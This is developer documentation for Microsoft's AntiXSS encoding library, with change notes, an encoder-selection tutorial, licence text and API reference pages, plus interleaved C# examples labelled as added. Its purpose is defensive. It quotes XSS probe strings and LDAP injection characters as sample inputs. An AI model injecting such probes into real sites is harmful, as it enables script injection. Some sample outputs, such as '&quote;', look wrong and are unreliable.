
Microsoft AntiXSS Library

Welcome to the Microsoft AntiXSS Library

Cross-site scripting (XSS) attacks exploit vulnerabilities in web-based applications that fail to properly validate and/or encode input that is embedded in response data. Malicious users can then inject client-side script into response data, causing the unsuspecting user's browser to execute the script code. The script code will appear to have originated from a trusted site and may be able to bypass browser protection mechanisms such as security zones.

These attacks are platform- and browser-independent, and can allow malicious users to perform malicious actions such as gaining unauthorized access to client data like cookies or hijacking sessions entirely.

See Also:

What's New / Change History

Using AntiXSS as the default ASP.NET encoder (.NET 4.0)

License Agreement

Microsoft.Security.Application

AntiXSS Help and Source

Web Protection Library Home Page

Discussion Forum

Source Code

(c) 2008, 2009, 2010, 2011 Microsoft Corporation. All rights reserved.


What's New in AntiXSS / Change History

What's new in AntiXSS 4.2

Minimum Requirements

You can now, once again, use the encoder libraries in .NET 2.0. .NET 2.0, 3.5 and 4.0 have their own libraries, optimised for each version of the framework.

.NET 4.0 Support

The .NET 4.0 version of AntiXSS comes with a class that can be used to set AntiXSS as the default encoder used by MVC, Web Pages and Web Forms applications.

Invalid Unicode is handled differently.

Invalid Unicode characters are now replaced with the Unicode replacement character, U+FFFD (�). Previously, when encoding strings through HtmlEncode, HtmlAttributeEncode, XmlEncode, XmlAttributeEncode or CssEncode, invalid Unicode characters would be detected and an exception thrown.

UrlPathEncode added.

The encoding library now has Encoder.UrlPathEncode(String), which will encode a string for use as the path part of a URL.

The HTML Sanitizer handles CSS differently.

The HTML Sanitizer now removes all CSS from the <head> section of an HTML page. If a <style> tag is discovered in the body of an HTML page, or in an input fragment, the tag will be removed but the content kept, as happens with other invalid tags. If the style attribute is discovered on an element it is removed.

What's new in AntiXSS 4.0

Minimum Requirements

The AntiXSS Library now requires .NET Framework 3.5.

Return Values

If you pass a null as the value to be encoded, the encoder will now return null. The previous behavior was to return String.Empty.

Medium Trust Support

The HTML Sanitization methods, GetSafeHtml() and GetSafeHtmlFragment(), have been moved to a separate assembly. This enables the AntiXssLibrary assembly to run in medium trust environments, a common user request. If you wish to use the HTML Sanitization library you must now include the HtmlSanitizationLibrary assembly. This assembly requires full trust and the ability to run unsafe code.

Adjustable safe-listing for HTML/XML Encoding

The safe list for HTML and XML encoding is now adjustable. The MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts) method allows you to choose, from the Unicode Code Charts, which languages your web application normally accepts. Safe-listing a language code chart leaves the defined characters in their native form during encoding, which increases readability in the HTML/XML document and speeds up encoding. Certain dangerous characters will always be encoded regardless of the safe list. The language code charts are defined in the Microsoft.Security.Application.LowerCodeCharts, Microsoft.Security.Application.LowerMidCodeCharts, Microsoft.Security.Application.MidCodeCharts, Microsoft.Security.Application.UpperMidCodeCharts and Microsoft.Security.Application.UpperCodeCharts enumerations.

It is suggested you safe-list your acceptable languages during your application initialization.
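Safe-listing at application start-up, as an added example that is not from the AntiXSS documentation: the call shape of MarkAsSafe with the five chart enumerations, and the visible effect on HtmlEncode. LowerCodeCharts.Cyrillic is assumed to be the member name for the Cyrillic chart (only the enumeration type names appear on this page), and the sample input is constructed.

```csharp
using System;
using Microsoft.Security.Application;

// Added example, not from the AntiXSS documentation. In an ASP.NET application call
// ConfigureEncoderSafeList() once from Application_Start in Global.asax; a console
// Main is used here so the before/after difference can be seen directly.
public static class EncoderSafeList
{
    // Accept Latin text (the Default lower charts) and Cyrillic text in HTML/XML output.
    // Characters in these charts are left in native form; everything outside them, plus
    // the characters the library always treats as dangerous (< > & " ...), is still encoded.
    // Assumption: LowerCodeCharts.Cyrillic is the flag for the U+0400 block.
    public static void ConfigureEncoderSafeList()
    {
        Encoder.MarkAsSafe(
            LowerCodeCharts.Default | LowerCodeCharts.Cyrillic,
            LowerMidCodeCharts.None,
            MidCodeCharts.None,
            UpperMidCodeCharts.None,
            UpperCodeCharts.None);
    }

    // Embeds an untrusted name in HTML element content with the HTML encoder.
    public static string RenderGreeting(string untrustedName)
    {
        return "<p>Hello " + Encoder.HtmlEncode(untrustedName) + "</p>";
    }

    public static void Main()
    {
        // Constructed sample input: markup plus a Cyrillic name.
        const string sample = "<b>Иван</b>";

        // With the default safe list the Cyrillic letters are emitted as &#NNNN; entities.
        Console.WriteLine(RenderGreeting(sample));

        ConfigureEncoderSafeList();

        // With the Cyrillic chart safe-listed the letters stay native; <b> is still encoded.
        Console.WriteLine(RenderGreeting(sample));
    }
}
```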

Invalid Unicode character detection

If any of the HTML, XML or CSS encoding methods encounters a character with a character code of 0xFFFE or 0xFFFF (the characters used to detect byte order at the beginning of files), an InvalidUnicodeValueException will be thrown.

Surrogate Character Support in HTML and XML encoding

Support for surrogate character pairs for Unicode characters outside the basic multilingual plane has been improved. Such character pairs are now combined and encoded as their &xxxxx; value. If a high surrogate pair character is encountered which is not followed by a low surrogate pair character, or a low surrogate pair character is encountered which is not preceded by a high surrogate pair character, an InvalidSurrogatePairException is thrown.

HTML 4.01 Named Entity Support

A new overload of the HtmlEncode method, Encoder.HtmlEncode(String, Boolean), allows you to specify if the named entities from the HTML 4.01 specification should be used in preference to &#xxxx; encoding when a named entity exists. For example, if useNamedEntities is set to true the copyright entity would be encoded as &copy;.

HtmlFormUrlEncode

A new encoding type, suitable for use in encoding HTML POST form submissions, is now available via Encoder.HtmlFormUrlEncode. This encodes according to the W3C specifications for the application/x-www-form-urlencoded MIME type.

LDAP Encoding changes

The LdapEncode function has been deprecated in favor of two new functions, Encoder.LdapFilterEncode(String) and Encoder.LdapDistinguishedNameEncode(String).

Encoder.LdapFilterEncode(String) encodes input according to RFC 4515, where unsafe values are converted to \XX, where XX is the representation of the unsafe character. For example:

Input                                          Output
ParensRUs (for all your parenthetical needs)   ParensRUs \28for all your parenthetical needs\29
*                                              \2A
C:\MyFile                                      C:\5CMyFile
Lučić                                          Lu\C4\8Di\C4\87

Encoder.LdapDistinguishedNameEncode(String) encodes input according to RFC 2253, where unsafe characters are converted to #XX, where XX is the representation of the unsafe character, and the comma, plus, quote, slash, less-than and greater-than signs are escaped using slash notation (\X). In addition to this, a space or octothorpe (#) at the beginning of the input string is \ escaped, as is a space at the end of a string.

Input            Output
,+\"\<>          \,\+\"\\\<\>
" Hello"         "\ Hello"          (leading space)
"Hello "         "Hello\ "          (trailing space)
#Hello           \#Hello
Lučić            Lu#C4#8Di#C4#87

Encoder.LdapDistinguishedNameEncode(String, Boolean, Boolean) is also provided so you may turn off the initial or final character escaping rules, for example if you are concatenating the escaped distinguished name fragment into the midst of a complete distinguished name. In addition to the RFC-mandated escaping, the safe list excludes the characters listed at http://projects.webappsec.org/LDAP-Injection.
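The two LDAP encoders applied to an untrusted value, as an added example that is not part of the AntiXSS documentation: an unencoded filter beside its encoded form, a DN built from an encoded RDN value, and the three-argument overload for a fragment spliced mid-DN. The filter shape, base DN and attribute names are assumptions.

```csharp
using System;
using Microsoft.Security.Application;

// Added example, not code from the AntiXSS documentation. The directory layout
// (objectClass=person, uid, cn, ou=people,dc=example,dc=com) is hypothetical.
public static class DirectoryQueries
{
    // Unencoded: the raw value becomes part of the filter grammar, so a value
    // containing "*", "(" or ")" changes what the query matches (LDAP injection).
    public static string UnencodedUserFilter(string untrustedUid)
    {
        return "(&(objectClass=person)(uid=" + untrustedUid + "))";
    }

    // Encoded: RFC 4515 escaping turns filter metacharacters into \XX sequences
    // ("*" becomes \2A, "(" becomes \28), so the value can only match literally.
    public static string EncodedUserFilter(string untrustedUid)
    {
        return "(&(objectClass=person)(uid=" + Encoder.LdapFilterEncode(untrustedUid) + "))";
    }

    // DN construction: RFC 2253 escaping of , + " \ < > plus the leading space or #
    // and trailing space rules keeps the value inside a single RDN.
    public static string EncodedUserDn(string untrustedCn)
    {
        return "cn=" + Encoder.LdapDistinguishedNameEncode(untrustedCn)
             + ",ou=people,dc=example,dc=com";
    }

    // When the fragment lands in the middle of an existing DN, the initial and final
    // character rules are switched off with the (String, Boolean, Boolean) overload.
    public static string EncodedMiddleFragment(string untrustedValue)
    {
        return Encoder.LdapDistinguishedNameEncode(untrustedValue, false, false);
    }

    public static void Main()
    {
        // Constructed sample inputs, taken from the tables above.
        foreach (string uid in new[] { "*", "C:\\MyFile", "Lučić" })
        {
            Console.WriteLine(UnencodedUserFilter(uid));
            Console.WriteLine(EncodedUserFilter(uid));
        }
        foreach (string cn in new[] { "#Hello", "Hello ", ",+\"\\<>" })
        {
            Console.WriteLine(EncodedUserDn(cn));
            Console.WriteLine(EncodedMiddleFragment(cn));
        }
    }
}
```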

Mark Output

The ability to mark output using an HtmlEncode overload and query string parameter has been removed.

See Also:

Using AntiXSS as the default ASP.NET encoder (.NET 4.0)


How do I use AntiXSS?

In this tutorial, I'll show you how the Microsoft Anti-Cross Site Scripting Library can be used to protect users from Cross-Site Scripting (XSS) attacks. I'll also show you an easy method for assessing use case scenarios for potential XSS vectors using nothing more than a simple table.

Note: Cross-site scripting (XSS) attacks exploit vulnerabilities in Web-based applications that fail to properly validate and/or encode input that is embedded in response data. Malicious users can then inject client-side script into response data, causing the unsuspecting user's browser to execute the script code. The script code will appear to have originated from a trusted site and may be able to bypass browser protection mechanisms such as security zones. In addition, certain server-side queries such as LDAP look-ups can be injected in much the same way as SQL queries can be injected, changing the result of the query.

These attacks are platform and browser independent, and can allow malicious users to perform undesired actions such as gaining unauthorized access to client data like cookies or hijacking sessions entirely.

If you want more information on XSS attacks, including instructions on how to test for it, some good references are:

How To: Prevent Cross-Site Scripting in ASP.NET

Cross-site scripting (Wikipedia)

Cross-site Scripting (XSS) (OWASP)

Protecting an application

To protect an application from XSS attacks we first need to understand the vectors that malicious users can use to conduct such attacks. Ideally, we should have done this at design time using threat modelling; however, we can still do this on applications that have already been implemented using the following steps:

1. Review code which produces output.

2. Determine whether output includes untrusted input parameters.

3. Determine the context in which untrusted input is used as output.

4. Encode the output appropriately.

If you aren't sure if input is trusted or not, always err on the side of caution and assume it is not. Examples of common untrusted input include:

Form fields

Query strings

Cookie contents

HTTP Headers

Which encoder should I use?

Once you have found code which outputs to the user you need to determine if the input is trusted or untrusted. Once you have decided the input is untrusted you determine which encoding method needs to be used to make the input safe. The following table will be helpful in determining which encoding method you must use.

Encoding Method: HtmlEncode
Should be used when: Untrusted input is used in HTML output, except when assigning to an HTML attribute.
Example: <p>Hello [Untrusted Input]</p>

Encoding Method: HtmlAttributeEncode
Should be used when: Untrusted input is used in HTML attributes.
Example: <p id="[Untrusted Input]"></p>

Encoding Method: XmlEncode
Should be used when: Untrusted input is used in XML output, except when assigning to an XML attribute.
Example: <name>[Untrusted Input]</name>

Encoding Method: XmlAttributeEncode
Should be used when: Untrusted input is used in XML attributes.
Example: <name firstName="[Untrusted Input]"></name>

Encoding Method: UrlEncode
Should be used when: Untrusted input is used as a query string value in a URL.
Example: <a href="http://search.bing.com/search?q=[Untrusted-input]">Click Here!</a>

Encoding Method: UrlPathEncode
Should be used when: Untrusted input is used as part of a path in a URL.
Example: <a href="http://msdn.microsoft.com/[Untrusted-input]/">Click Here!</a>

Encoding Method: JavaScriptEncode
Should be used when: Untrusted input is used within a JavaScript context.
Example: <script>var something="[Untrusted Input]";</script>

Other encoder methods include HtmlFormUrlEncode, which is used when, in code, you are building an HTTP POST request to submit to a web site, and LdapDistinguishedNameEncode and LdapFilterEncode, which encode untrusted input for safe use when building filters or queries against an LDAP database.

Using AntiXSS

Now that you've determined which scenarios require encoding, all that is left to do is add the Microsoft Anti-Cross Site Scripting Library to your project and encode the untrusted input as it is embedded in response data. After you've installed the library you need to add a reference into your project. To do this use the following steps:

1. Right click the project in the Solution Explorer window in Visual Studio.

2. Select the Add Reference... option from the context menu.

3. Select the Browse tab and select the installation directory, then add the AntiXSSLibrary.dll appropriate for the .NET framework version you are using.

If you have not changed the install directory the library will be in C:\Program Files\Microsoft Information Security\AntiXSS Library v4.2 (32 bit OSes) or C:\Program Files (x86)\Microsoft Information Security\AntiXSS Library v4.2 (64 bit OSes). This folder will contain 3 directories, one for each version of the .NET framework AntiXSS supports.

Once you've added the reference to the library you will need to adjust your code to use the appropriate encoder. To do this, open the files which contain code that writes output, then:

1. Add a using directive: using Microsoft.Security.Application;

2. Change the code which assigns output. For example, string Name = Request.QueryString["Name"]; would become string Name = Encoder.HtmlEncode(Request.QueryString["Name"]);

Now rebuild your web application and test for XSS.
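The four steps above carried through every output context in the encoder table, as an added example (not code from the AntiXSS documentation or the tutorial): one untrusted value rendered into element content, an attribute, a query string, a URL path and a JavaScript literal, each through the encoder that matches its context. The class name, method name and sample input are constructed.

```csharp
using System;
using System.Text;
using Microsoft.Security.Application;

// Added example, not code from the AntiXSS documentation. ProfileRenderer and Render
// are hypothetical names; in a real page the value would come from Request.QueryString
// or a form field.
public static class ProfileRenderer
{
    // Each sink gets the encoder for its own context. A single HtmlEncode over the
    // value would leave the attribute, URL and script contexts unprotected.
    public static string Render(string untrustedName)
    {
        // AntiXSS 4.0 and later return null for null input, so normalise first.
        string name = untrustedName ?? string.Empty;
        var html = new StringBuilder();

        // HTML element content.
        html.Append("<p>Hello ").Append(Encoder.HtmlEncode(name)).Append("</p>\n");

        // Quoted HTML attribute value; HtmlAttributeEncode also encodes spaces as &#32;.
        html.Append("<p id=\"").Append(Encoder.HtmlAttributeEncode(name)).Append("\"></p>\n");

        // Query string value. UrlEncode leaves only unreserved characters and %XX escapes,
        // none of which is special inside a double-quoted attribute.
        html.Append("<a href=\"http://search.bing.com/search?q=")
            .Append(Encoder.UrlEncode(name)).Append("\">Click Here!</a>\n");

        // Path segment of a URL: UrlPathEncode (added in 4.2), not UrlEncode.
        html.Append("<a href=\"http://msdn.microsoft.com/")
            .Append(Encoder.UrlPathEncode(name)).Append("/\">Click Here!</a>\n");

        // JavaScript string literal. JavaScriptEncode(String) emits the surrounding
        // quotes itself (see its remarks), so no extra quotes are written here.
        html.Append("<script>var something = ")
            .Append(Encoder.JavaScriptEncode(name)).Append(";</script>\n");

        return html.ToString();
    }

    public static void Main()
    {
        // Constructed sample input: the probe string the reference pages use.
        Console.Write(Render("<script>alert('XSS Attack!');</script>"));
        // Null input is handled the same way as an empty string.
        Console.Write(Render(null));
    }
}
```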

See Also:

Using AntiXSS as the default ASP.NET encoder (.NET 4.0)


Using AntiXSS as the default ASP.NET encoder

.NET 4.0 introduced the ability to swap the default encoding libraries from the core .NET framework libraries to any external library which implements System.Web.Util.HttpEncoder. AntiXSS 4.1 now provides an implementation of this class which will allow you to use AntiXSS as the default encoder in both MVC and Web Forms.

To configure AntiXSS as the default encoder you will need to ensure you have added the .NET 4.0 version of the library to your application. You must also add an encoderType attribute to the httpRuntime section in your web.config:

<httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary"/>

See Also:

What's New in AntiXSS


License Agreement

Microsoft Public License (Ms-PL)

Microsoft Web Protection Library (http://wpl.codeplex.com). This work is licensed under the Microsoft Public License (Ms-PL). Copyright (c) 2010 Microsoft Corporation.

This license governs use of the accompanying software. If you use the software, you accept this license. If you do not accept the license, do not use the software.

1. Definitions - The terms "reproduce," "reproduction," "derivative works," and "distribution" have the same meaning here as under U.S. copyright law. A "contribution" is the original software, or any additions or changes to the software. A "contributor" is any person that distributes its contribution under this license. "Licensed patents" are a contributor's patent claims that read directly on its contribution.

2. Grant of Rights

   1. Copyright Grant - Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.

   2. Patent Grant - Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.

3. Conditions and Limitations

   1. No Trademark License - This license does not grant you rights to use any contributors' name, logo, or trademarks.

   2. If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.

   3. If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.

   4. If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.

   5. The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees, or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.


Microsoft.Security.Application Namespace

The Microsoft Anti-Cross Site Scripting Library is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique (sometimes referred to as the principle of inclusions) to provide protection against XSS attacks. This approach works by first defining a valid or allowable set of characters, and encodes anything outside this set (invalid characters or potential attacks). The white-listing approach provides several advantages over other encoding schemes.

Classes

Class                    Description
Encoder                  Performs encoding of input strings to provide protection against Cross-Site Scripting (XSS) attacks and LDAP injection attacks in various contexts.
Sanitizer                Sanitizes input HTML to make it safe to be displayed on a browser by removing potentially dangerous tags.
UnicodeCharacterEncoder  Provides HTML encoding methods.

Enumerations

Enumeration         Description
LowerCodeCharts     Values for the lowest section of the UTF8 Unicode code tables, from U0000 to U0FFF.
LowerMidCodeCharts  Values for the lower-mid section of the UTF8 Unicode code tables, from U1000 to U1EFF.
MidCodeCharts       Values for the middle section of the UTF8 Unicode code tables, from U1F00 to U2DDF.
UpperCodeCharts     Values for the upper section of the UTF8 Unicode code tables, from UA8E0 to UFFFD.
UpperMidCodeCharts  Values for the upper middle section of the UTF8 Unicode code tables, from U2DE0 to UA8DF.


Encoder Class

Performs encoding of input strings to provide protection against Cross-Site Scripting (XSS) attacks and LDAP injection attacks in various contexts.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static class Encoder

Visual Basic

Public NotInheritable Class Encoder

Visual C++

public ref class Encoder abstract sealed

Remarks

This encoding library uses the Principle of Inclusions, sometimes referred to as "safe-listing", to provide protection against injection attacks. With safe-listing protection, algorithms look for valid inputs and automatically treat everything outside that set as a potential attack. This library can be used as a defense-in-depth approach with other mitigation techniques. It is suitable for applications with high security requirements.

Inheritance Hierarchy

System.Object
    Microsoft.Security.Application.Encoder

See Also

Encoder Members
Microsoft.Security.Application Namespace


Encoder Members

The Encoder type exposes the following members.

Methods

CssEncode
    Encodes the specified string for use in Cascading Style Sheet (CSS) attributes. The return value from this function is expected to be used in building an attribute string. CSS string attributes should be quoted values.

HtmlAttributeEncode
    Encodes an input string for use in an HTML attribute.

HtmlEncode(String)
    Encodes input strings for use in HTML.

HtmlEncode(String, Boolean)
    Encodes input strings for use in HTML.

HtmlFormUrlEncode(String)
    Encodes input strings for use in application/x-www-form-urlencoded form submissions.

HtmlFormUrlEncode(String, Int32)
    Encodes input strings for use in application/x-www-form-urlencoded form submissions.

HtmlFormUrlEncode(String, Encoding)
    Encodes input strings for use in application/x-www-form-urlencoded form submissions.

JavaScriptEncode(String)
    Encodes input strings for use in JavaScript.

JavaScriptEncode(String, Boolean)
    Encodes input strings for use in JavaScript.

LdapDistinguishedNameEncode(String)
    Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.

LdapDistinguishedNameEncode(String, Boolean, Boolean)
    Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.

LdapEncode
    Obsolete. Encodes input strings to be used as a value in Lightweight Directory Access Protocol (LDAP) search queries.

LdapFilterEncode
    Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) filter queries.

UrlEncode(String)
    Encodes input strings for use in universal resource locators (URLs).

UrlEncode(String, Int32)
    Encodes input strings for use in universal resource locators (URLs).

UrlEncode(String, Encoding)
    Encodes input strings for use in universal resource locators (URLs).

UrlPathEncode
    URL-encodes the path section of a URL string and returns the encoded string.

VisualBasicScriptEncode
    Encodes input strings for use in Visual Basic Script.

XmlAttributeEncode
    Encodes input strings for use in XML attributes.

XmlEncode
    Encodes input strings for use in XML.

See Also

Encoder Class
Microsoft.Security.Application Namespace


Encoder.CssEncode Method

Encodes the specified string for use in Cascading Style Sheet (CSS) attributes. The return value from this function is expected to be used in building an attribute string. CSS string attributes should be quoted values.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string CssEncode(
    string input
)

Visual Basic

Public Shared Function CssEncode ( _
    input As String _
) As String

Visual C++

public:
static String^ CssEncode(
    String^ input
)

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in CSS element values.

Remarks

This method encodes all characters except those that are in the safe list. The following table lists the default safe characters.

Unicode Code Chart           Character(s)   Description
C0 Controls and Basic Latin  A-Z            Uppercase alphabetic letters
C0 Controls and Basic Latin  a-z            Lowercase alphabetic letters
C0 Controls and Basic Latin  0-9            Numbers

The CSS character escape sequence consists of a backslash character (\) followed by up to six hexadecimal digits that represent a character code from the ISO 10646 standard. (The ISO 10646 standard is effectively equivalent to Unicode.) Any character other than a hexadecimal digit terminates the escape sequence. If a character that follows the escape sequence is also a valid hexadecimal digit, it must either include six digits in the escape sequence or use a whitespace character to terminate the escape sequence. For example, \000020 denotes a space.

See Also

Encoder Class
Microsoft.Security.Application Namespace


Encoder.HtmlAttributeEncode Method

Encodes an input string for use in an HTML attribute.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlAttributeEncode(
    string input
)

Visual Basic

Public Shared Function HtmlAttributeEncode ( _
    input As String _
) As String

Visual C++

public:
static String^ HtmlAttributeEncode(
    String^ input
)

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

The input string encoded for use in an HTML attribute.

Remarks

This function encodes all but known safe characters. Characters are encoded using &#DECIMAL; notation. Safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
,    Comma
.    Period
-    Dash
_    Underscore

The safe list may be adjusted using MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts).

Example inputs and encoded outputs:

Input                               Output
alert('XSS Attack!');               alert(&#39;XSS&#32;Attack!&#39;);
user@contoso.com                    user@contoso.com
Anti-Cross Site Scripting Library   Anti-Cross&#32;Site&#32;Scripting&#32;Library

See Also

Encoder Class
Microsoft.Security.Application Namespace


Encoder.HtmlEncode Method

Overload List

Name                         Description
HtmlEncode(String)           Encodes input strings for use in HTML.
HtmlEncode(String, Boolean)  Encodes input strings for use in HTML.

See Also

Encoder Class
Encoder Members
Microsoft.Security.Application Namespace


Encoder.HtmlEncode Method (String)

Encodes input strings for use in HTML.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlEncode(
    string input
)

Visual Basic

Public Shared Function HtmlEncode ( _
    input As String _
) As String

Visual C++

public:
static String^ HtmlEncode(
    String^ input
)

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in HTML.

Remarks

All characters not safe-listed are encoded to their Unicode decimal value, using &#DECIMAL; notation. The default safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
,    Comma
.    Period
-    Dash
_    Underscore
'    Apostrophe
     Space

The safe list may be adjusted using MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts).

Example inputs and their related encoded outputs:

Input                                     Output
<script>alert('XSS Attack!');</script>    &lt;script&gt;alert('XSS Attack!');&lt;/script&gt;
user@contoso.com                          user@contoso.com
Anti-Cross Site Scripting Library         Anti-Cross Site Scripting Library
"Anti-Cross Site Scripting Library"       &quote;Anti-Cross Site Scripting Library&quote;

See Also

Encoder Class
HtmlEncode Overload
Microsoft.Security.Application Namespace


Encoder.HtmlEncode Method (String, Boolean)

Encodes input strings for use in HTML.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlEncode(
    string input,
    bool useNamedEntities
)

Visual Basic

Public Shared Function HtmlEncode ( _
    input As String, _
    useNamedEntities As Boolean _
) As String

Visual C++

public:
static String^ HtmlEncode(
    String^ input,
    bool useNamedEntities
)

Parameters

input
    Type: System.String
    String to be encoded.

useNamedEntities
    Type: System.Boolean
    Value indicating if the HTML 4.0 named entities should be used.

Return Value

Encoded string for use in HTML.

Remarks

All characters not safe-listed are encoded to their Unicode decimal value, using &#DECIMAL; notation. If you choose to use named entities, then if a character is an HTML 4.0 named entity the named entity will be used. The default safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
,    Comma
.    Period
-    Dash
_    Underscore
'    Apostrophe
     Space

The safe list may be adjusted using MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts).

Example inputs and their related encoded outputs:

Input                                     Output
<script>alert('XSS Attack!');</script>    &lt;script&gt;alert('XSS Attack!');&lt;/script&gt;
user@contoso.com                          user@contoso.com
Anti-Cross Site Scripting Library         Anti-Cross Site Scripting Library
"Anti-Cross Site Scripting Library"       &quote;Anti-Cross Site Scripting Library&quote;

See Also

Encoder Class
HtmlEncode Overload
Microsoft.Security.Application Namespace


Encoder.HtmlFormUrlEncode Method

Overload List

Name                                 Description
HtmlFormUrlEncode(String)            Encodes input strings for use in application/x-www-form-urlencoded form submissions.
HtmlFormUrlEncode(String, Int32)     Encodes input strings for use in application/x-www-form-urlencoded form submissions.
HtmlFormUrlEncode(String, Encoding)  Encodes input strings for use in application/x-www-form-urlencoded form submissions.

See Also

Encoder Class
Encoder Members
Microsoft.Security.Application Namespace


Encoder.HtmlFormUrlEncode Method (String)

Encodes input strings for use in application/x-www-form-urlencoded form submissions.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlFormUrlEncode(
    string input
)

Visual Basic

Public Shared Function HtmlFormUrlEncode ( _
    input As String _
) As String

Visual C++

public:
static String^ HtmlFormUrlEncode(
    String^ input
)

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in URLs.

Remarks

This function encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. Safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
.    Period
-    Dash
_    Underscore
~    Tilde

Example inputs and encoded outputs:

Input                               Output
alert('XSS Attack!');               alert%28%27XSS+Attack%21%27%29%3b
user@contoso.com                    user%40contoso.com
Anti-Cross Site Scripting Library   Anti-Cross+Site+Scripting+Library

See Also

Encoder Class
HtmlFormUrlEncode Overload
Microsoft.Security.Application Namespace


Encoder.HtmlFormUrlEncode Method (String, Int32)

Encodes input strings for use in application/x-www-form-urlencoded form submissions.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlFormUrlEncode(
    string input,
    int codePage
)

Visual Basic

Public Shared Function HtmlFormUrlEncode ( _
    input As String, _
    codePage As Integer _
) As String

Visual C++

public:
static String^ HtmlFormUrlEncode(
    String^ input,
    int codePage
)

Parameters

input
    Type: System.String
    String to be encoded.

codePage
    Type: System.Int32
    Code page number of the input.

Return Value

Encoded string for use in URLs.

Remarks

This function encodes the output as per the encoding parameter (code page) passed to it. It encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. Safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
.    Period
-    Dash
_    Underscore
~    Tilde

Example inputs and encoded outputs:

Input                               Output
alert('XSS Attack!');               alert%28%27XSS%82%a0Attack%21%27%29%3b
user@contoso.com                    user%40contoso.com
Anti-Cross Site Scripting Library   Anti-Cross+Site+Scripting+Library

See Also

Encoder Class
HtmlFormUrlEncode Overload
Microsoft.Security.Application Namespace


Encoder.HtmlFormUrlEncode Method (String, Encoding)

Encodes input strings for use in application/x-www-form-urlencoded form submissions.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

public static string HtmlFormUrlEncode(
    string input,
    Encoding inputEncoding
)

Visual Basic

Public Shared Function HtmlFormUrlEncode ( _
    input As String, _
    inputEncoding As Encoding _
) As String

Visual C++

public:
static String^ HtmlFormUrlEncode(
    String^ input,
    Encoding^ inputEncoding
)

Parameters

input
    Type: System.String
    String to be encoded.

inputEncoding
    Type: System.Text.Encoding
    Input encoding type.

Return Value

Encoded string for use in URLs.

Remarks

This function encodes the output as per the encoding parameter (code page) passed to it. It encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. If the inputEncoding is null then UTF-8 is assumed by default. Safe characters include:

a-z  Lowercase alphabet
A-Z  Uppercase alphabet
0-9  Numbers
.    Period
-    Dash
_    Underscore
~    Tilde

Example inputs and encoded outputs:

Input                               Output
alert('XSS Attack!');               alert%28%27XSS%82%a0Attack%21%27%29%3b
user@contoso.com                    user%40contoso.com
Anti-Cross Site Scripting Library   Anti-Cross+Site+Scripting+Library

See Also

Encoder Class
HtmlFormUrlEncode Overload
Microsoft.Security.Application Namespace


Encoder.JavaScriptEncode Method

Overload List

Name                               Description
JavaScriptEncode(String)           Encodes input strings for use in JavaScript.
JavaScriptEncode(String, Boolean)  Encodes input strings for use in JavaScript.

See Also

Encoder Class
Encoder Members
Microsoft.Security.Application Namespace

